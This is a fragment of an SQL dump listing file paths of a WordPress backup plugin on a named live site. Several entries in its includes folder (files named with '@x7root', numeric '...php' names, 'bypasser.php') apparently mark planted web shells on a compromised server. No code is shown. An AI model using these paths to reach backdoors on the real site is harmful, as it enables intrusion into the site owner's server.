backup/admin/images/upload-min.png','wp-content/plugins/backup-backup/admin/images/upload-min.png'),(115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/upload.svg','wp-content/plugins/backup-backup/admin/images/upload.svg'),(116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/warning-grey.png','wp-content/plugins/backup-backup/admin/images/warning-grey.png'),(117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/warning-red.png','wp-content/plugins/backup-backup/admin/images/warning-red.png'),(118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/x-face.png','wp-content/plugins/backup-backup/admin/images/x-face.png'),(119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/js/backup-migration.min.js','wp-content/plugins/backup-backup/admin/js/backup-migration.min.js'),(120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/css/customize.css','wp-content/plugins/backup-backup/analyst/assets/css/customize.css'),(121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/img/pencil.png','wp-content/plugins/backup-backup/analyst/assets/img/pencil.png'),(122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/img/shield_question.png','wp-content/plugins/backup-backup/analyst/assets/img/shield_question.png'),(123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/img/shield_success.png','wp-content/plugins/backup-backup/analyst/assets/img/shield_success.png'),(124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/img/smile.png','wp-content/plugins/backup-backup/analyst/assets/img/smile.png'),(125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/index.php','wp-content/plugins/backup-backup/analyst/assets/index.php'),(126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/assets/js/customize.js','wp-content/plugins/backup-backup/analyst/assets/js/customize.js'),(127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/autoload.php','wp-content/plugins/backup-backup/analyst/autoload.php'),(128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/index.php','wp-content/plugins/backup-backup/analyst/index.php'),(129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/main.php','wp-content/plugins/backup-backup/analyst/main.php'),(130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/sdk_resolver.php','wp-content/plugins/backup-backup/analyst/sdk_resolver.php'),(131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Account/Account.php','wp-content/plugins/backup-backup/analyst/src/Account/Account.php'),(132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Account/AccountData.php','wp-content/plugins/backup-backup/analyst/src/Account/AccountData.php'),(133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Account/AccountDataFactory.php','wp-content/plugins/backup-backup/analyst/src/Account/AccountDataFactory.php'),(134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Analyst.php','wp-content/plugins/backup-backup/analyst/src/Analyst.php'),(135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/ApiRequestor.php','wp-content/plugins/backup-backup/analyst/src/ApiRequestor.php'),(136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/ApiResponse.php','wp-content/plugins/backup-backup/analyst/src/ApiResponse.php'),(137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Cache/DatabaseCache.php','wp-content/plugins/backup-backup/analyst/src/Cache/DatabaseCache.php'),(138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Collector.php','wp-content/plugins/backup-backup/analyst/src/Collector.php'),(139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/AnalystContract.php','wp-content/plugins/backup-backup/analyst/src/Contracts/AnalystContract.php'),(140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/CacheContract.php','wp-content/plugins/backup-backup/analyst/src/Contracts/CacheContract.php'),(141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/HttpClientContract.php','wp-content/plugins/backup-backup/analyst/src/Contracts/HttpClientContract.php'),(142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/RequestContract.php','wp-content/plugins/backup-backup/analyst/src/Contracts/RequestContract.php'),(143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/RequestorContract.php','wp-content/plugins/backup-backup/analyst/src/Contracts/RequestorContract.php'),(144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Contracts/TrackerContract.php','wp-content/plugins/backup-backup/analyst/src/Contracts/TrackerContract.php'),(145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Core/AbstractFactory.php','wp-content/plugins/backup-backup/analyst/src/Core/AbstractFactory.php'),(146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/CurlHttpClient.php','wp-content/plugins/backup-backup/analyst/src/Http/CurlHttpClient.php'),(147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/DummyHttpClient.php','wp-content/plugins/backup-backup/analyst/src/Http/DummyHttpClient.php'),(148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/AbstractLoggerRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/AbstractLoggerRequest.php'),(149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/ActivateRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/ActivateRequest.php'),(150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/DeactivateRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/DeactivateRequest.php'),(151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/InstallRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/InstallRequest.php'),(152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/OptInRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/OptInRequest.php'),(153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/OptOutRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/OptOutRequest.php'),(154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/Requests/UninstallRequest.php','wp-content/plugins/backup-backup/analyst/src/Http/Requests/UninstallRequest.php'),(155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Http/WordPressHttpClient.php','wp-content/plugins/backup-backup/analyst/src/Http/WordPressHttpClient.php'),(156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Mutator.php','wp-content/plugins/backup-backup/analyst/src/Mutator.php'),(157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Notices/Notice.php','wp-content/plugins/backup-backup/analyst/src/Notices/Notice.php'),(158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/Notices/NoticeFactory.php','wp-content/plugins/backup-backup/analyst/src/Notices/NoticeFactory.php'),(159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/src/helpers.php','wp-content/plugins/backup-backup/analyst/src/helpers.php'),(160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/forms/deactivate.php','wp-content/plugins/backup-backup/analyst/templates/forms/deactivate.php'),(161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/forms/install.php','wp-content/plugins/backup-backup/analyst/templates/forms/install.php'),(162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/notice.php','wp-content/plugins/backup-backup/analyst/templates/notice.php'),(163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/optin.php','wp-content/plugins/backup-backup/analyst/templates/optin.php'),(164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/templates/optout.php','wp-content/plugins/backup-backup/analyst/templates/optout.php'),(165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/analyst/version.php','wp-content/plugins/backup-backup/analyst/version.php'),(166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/backup-backup.php','wp-content/plugins/backup-backup/backup-backup.php'),(167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/.htaccess','wp-content/plugins/backup-backup/includes/.htaccess'),(168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/2797806595...php','wp-content/plugins/backup-backup/includes/2797806595...php'),(169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/3688038378...php','wp-content/plugins/backup-backup/includes/3688038378...php'),(170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/CTY@x7root.php','wp-content/plugins/backup-backup/includes/CTY@x7root.php'),(171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/Mzc@x7root.php','wp-content/plugins/backup-backup/includes/Mzc@x7root.php'),(172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/activation.php','wp-content/plugins/backup-backup/includes/activation.php'),(173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/ajax.php','wp-content/plugins/backup-backup/includes/ajax.php'),(174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/analyst.php','wp-content/plugins/backup-backup/includes/analyst.php'),(175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-cli.php','wp-content/plugins/backup-backup/includes/backup-cli.php'),(176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php','wp-content/plugins/backup-backup/includes/backup-heart.php'),(177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/assets/index.min.js','wp-content/plugins/backup-backup/includes/banner/assets/index.min.js'),(178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/assets/style.min.css','wp-content/plugins/backup-backup/includes/banner/assets/style.min.css'),(179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/misc.php','wp-content/plugins/backup-backup/includes/banner/misc.php'),(180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/index.php','wp-content/plugins/backup-backup/includes/banner/views/index.php'),(181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-images.png','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-images.png'),(182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-texture-grey.png','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/background-texture-grey.png'),(183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/big-colored-logo.png','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/big-colored-logo.png'),(184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/colored-logo.svg'),(185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/white-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/imgs/white-logo.svg'),(186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/install.php'),(187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/installed.php','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/installed.php'),(188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/upgrade.php','wp-content/plugins/backup-backup/includes/banner/views/projects/bmi/upgrade.php'),(189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/background-texture-grey.png','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/background-texture-grey.png'),(190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/big-colored-logo.png','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/big-colored-logo.png'),(191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/colored-logo.svg'),(192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/main-background-image.png','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/main-background-image.png'),(193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/secondary-background-image.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/secondary-background-image.svg'),(194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/white-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/imgs/white-logo.svg'),(195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/install.php'),(196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/installed.php','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/installed.php'),(197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/upgrade.php','wp-content/plugins/backup-backup/includes/banner/views/projects/cdp/upgrade.php'),(198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-bottom-left.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-bottom-left.svg'),(199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-bottom-right.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-bottom-right.svg'),(200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-top-left.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-top-left.svg'),(201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-top-right.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/background-top-right.svg'),(202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/big-colored-logo.png','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/big-colored-logo.png'),(203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/colored-logo.svg'),(204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face1.png','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face1.png'),(205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face2.png','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face2.png'),(206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face3.png','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face3.png'),(207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face4.png','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/face4.png'),(208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/white-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/imgs/white-logo.svg'),(209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/fit/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/fit/install.php'),(210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-images.png','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-images.png'),(211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-green.png','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-green.png'),(212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-grey.png','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/background-texture-grey.png'),(213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/big-colored-logo.png','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/big-colored-logo.png'),(214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/colored-logo.svg'),(215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/white-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/imgs/white-logo.svg'),(216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/install.php'),(217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/installed.php','wp-content/plugins/backup-backup/includes/banner/views/projects/mpu/installed.php'),(218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/background-top-left.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/background-top-left.svg'),(219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/big-colored-logo-rr.png','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/big-colored-logo-rr.png'),(220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/colored-logo-rr.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/colored-logo-rr.svg'),(221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/main-background-image.png','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/main-background-image.png'),(222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/not-colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/red/imgs/not-colored-logo.svg'),(223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/red/install.php'),(224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/red/installed.php','wp-content/plugins/backup-backup/includes/banner/views/projects/red/installed.php'),(225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-1.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-1.svg'),(226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-2.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-2.svg'),(227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-3.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/background-image-3.svg'),(228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/big-colored-logo.png','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/big-colored-logo.png'),(229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/colored-logo.svg'),(230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/white-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/imgs/white-logo.svg'),(231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/twp/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/twp/install.php'),(232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/background-icons.png','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/background-icons.png'),(233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/background-image.png','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/background-image.png'),(234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/big-colored-logo.png','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/big-colored-logo.png'),(235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/colored-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/colored-logo.svg'),(236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/play-icon.png','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/play-icon.png'),(237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/ribbon-icon.png','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/ribbon-icon.png'),(238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/video-background.png','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/video-background.png'),(239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/white-logo.svg','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/imgs/white-logo.svg'),(240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/install.php'),(241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/installed.php','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/installed.php'),(242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-install.php','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-install.php'),(243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-upgrade.php','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/part-upgrade.php'),(244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/projects/usm/upgrade.php','wp-content/plugins/backup-backup/includes/banner/views/projects/usm/upgrade.php'),(245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/already-installed.svg','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/already-installed.svg'),(246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/check-icon.svg','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/check-icon.svg'),(247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/clock-icon.svg','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/clock-icon.svg'),(248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/rating.svg','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/rating.svg'),(249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/imgs/white-arrow-right.svg','wp-content/plugins/backup-backup/includes/banner/views/static/imgs/white-arrow-right.svg'),(250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/banner/views/static/tabs.php','wp-content/plugins/backup-backup/includes/banner/views/static/tabs.php'),(251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/bsP@x7root.php','wp-content/plugins/backup-backup/includes/bsP@x7root.php'),(252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/bypasser.php','wp-content/plugins/backup-backup/includes/bypasser.php'),(253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/check/checker.php','wp-content/plugins/backup-backup/includes/check/checker.php'),(254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/check/system_info.php','wp-content/plugins/backup-backup/includes/check/system_info.php'),(255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cli/php_cli_finder.php','wp-content/plugins/backup-backup/includes/cli/php_cli_finder.php'),(256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cli/version_check.php','wp-content/plugins/backup-backup/includes/cli/version_check.php'),(257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cli-handler.php','wp-content/plugins/backup-backup/includes/cli-handler.php'),(258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/compatibility.php','wp-content/plugins/backup-backup/includes/compatibility.php'),(259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/config.php','wp-content/plugins/backup-backup/includes/config.php'),(260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/constants.php','wp-content/plugins/backup-backup/includes/constants.php'),(261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/cron/handler.php','wp-content/plugins/backup-backup/includes/cron/handler.php'),(262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/AA-Template.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/AA-Template.php'),(263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/other_config.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/other_config.php'),(264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/save-button.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/save-button.php'),(265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/staging.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/staging.php'),(266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/store_config.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/store_config.php'),(267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/troubleshooting.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/troubleshooting.php'),(268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/what_backed_up.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/what_backed_up.php'),(269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/chapter/where_config.php','wp-content/plugins/backup-backup/includes/dashboard/chapter/where_config.php'),(270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/AA-Modal-Template.php','wp-content/plugins/backup-backup/includes/dashboard/modals/AA-Modal-Template.php'),(271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/after-logs-sent.php','wp-content/plugins/backup-backup/includes/dashboard/modals/after-logs-sent.php'),(272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/backup-error-modal.php','wp-content/plugins/backup-backup/includes/dashboard/modals/backup-error-modal.php'),(273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/backup-progress-modal.php','wp-content/plugins/backup-backup/includes/dashboard/modals/backup-progress-modal.php'),(274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/backup-success-modal.php','wp-content/plugins/backup-backup/includes/dashboard/modals/backup-success-modal.php'),(275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/dashboard/modals/bfs-modal.php','wp-content/plugins/backup-backup/includes/dashboard/modals/bfs-modal.php'),(276,'/home/tummmyov/tummyrevolution.com/wp-content/p